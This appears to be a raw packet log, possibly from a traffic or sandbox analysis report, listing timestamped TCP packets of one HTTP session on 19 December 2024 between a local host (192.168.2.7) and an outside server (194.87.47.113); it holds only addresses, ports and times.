Dec 19, 2024 08:47:24.447962046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.448070049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.448630095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.448753119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.448805094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.449410915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.449512959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.449692011 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.450212955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.450459957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.450536013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.451056957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.451280117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.451343060 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.451968908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.452171087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.452230930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.452933073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.453026056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.453092098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.453668118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.454042912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.454106092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.454632998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.454699039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.454768896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.455426931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.455650091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.455734015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.456259012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.456285000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.456474066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.456530094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.457159996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.457288027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.457369089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.458122969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.458344936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.458486080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.458873034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.459048986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.459115982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.459743023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.460057974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.460123062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.460553885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.460752964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.460803986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.461441040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.461700916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.461736917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.462291956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.462507963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.462677002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.463247061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.469799042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.530792952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.530980110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.531047106 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.531291008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.575253010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.598815918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.598998070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.599098921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.599220991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.599361897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.599467039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.599706888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.600120068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.600527048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.600601912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.600980997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.601416111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.606282949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.606492043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.606791019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.606842041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.607198954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.607266903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.607530117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.607930899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.607983112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.608392954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.608625889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.608700037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.609288931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.609416962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.609498024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.610105038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.610332012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.610390902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.611131907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.611182928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.611335993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.611885071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.612157106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.612220049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.612695932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.612916946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.612978935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.613574982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.613729000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.614032030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.620285034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.620495081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.620723009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.620876074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.621205091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.621328115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.621556044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.621896982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.621947050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.622411966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.622549057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.623135090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.623199940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.623348951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.624037981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.624082088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.624386072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.624442101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.624926090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.625015974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.625072002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.625729084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.625891924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.625993013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.626633883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.626794100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.626883984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.627440929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.627614975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.628317118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.628402948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.628487110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.629071951 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.629179955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.629302979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.629354000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.630047083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.630208015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.630255938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.630884886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.631185055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.631309986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.631767988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.631911039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.632015944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.632620096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.632810116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.632862091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.633462906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.633686066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.633972883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.634701014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.634901047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.635059118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.635230064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.635417938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.635505915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.636409044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.636425018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.636632919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.637167931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.637183905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.637280941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.637931108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.638151884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.638196945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.638689995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.638840914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.638902903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.639645100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.639916897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.639997005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.640480995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.640553951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.640657902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.641396999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.641571999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.641599894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.642079115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.642195940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.642299891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.643011093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.643147945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.643177986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.643219948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.644035101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.644263983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.644474983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.645189047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.645389080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.645934105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.646063089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.646193981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.646258116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.646675110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.646811008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.646881104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.647325993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.648051977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.648269892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.648433924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.648782969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.649019003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.649419069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.649432898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.649544954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.649876118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.650150061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.650346041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.650749922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.650979042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.651252985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.651622057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.651791096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.651839972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.652447939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.652715921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.652805090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.653409958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.653837919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.653898954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.674834967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.790919065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.791064024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.791115046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.791419983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.791774035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.791980028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.792184114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.792495966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.792578936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.792833090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.798814058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.799000978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.799067020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.799318075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.799680948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.799782991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.800000906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.800391912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.800690889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.800770998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.800817013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.801068068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.801568031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.801762104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.801826000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.802351952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.802580118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.802601099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.803137064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.803327084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.803373098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.803949118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.804007053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.804161072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.804764032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.804891109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.804927111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.805541039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.805670023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.805701017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.812556982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.812647104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.812742949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.813071966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.813174963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.813492060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.813800097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.813910961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.814045906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.814378977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.814425945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.814851999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.815099001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.815252066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.815542936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.815768003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.815861940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.816406965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.816560984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.816621065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.817186117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.817490101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.817537069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.817943096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.818185091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.818319082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.818831921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.819027901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.819207907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.819528103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.819725990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.819822073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.820334911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.820557117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.820616961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.821145058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.821305037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.821430922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.821902037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.822094917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.822670937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.822727919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.822858095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.823534012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.823576927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.823714972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.823812962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.824434996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.824584961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.824697971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.825089931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.825297117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.825402021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.825876951 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.826075077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.826129913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.826668978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.826849937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.826947927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.827426910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.827610970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.827708960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.828233004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.828438997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.828488111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.829021931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.829232931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.829325914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.829818010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.830005884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.830104113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.830626011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.830821037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:24.830892086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:24.831397057 CET	80	49707	194.87.47.113	192.168.2.7
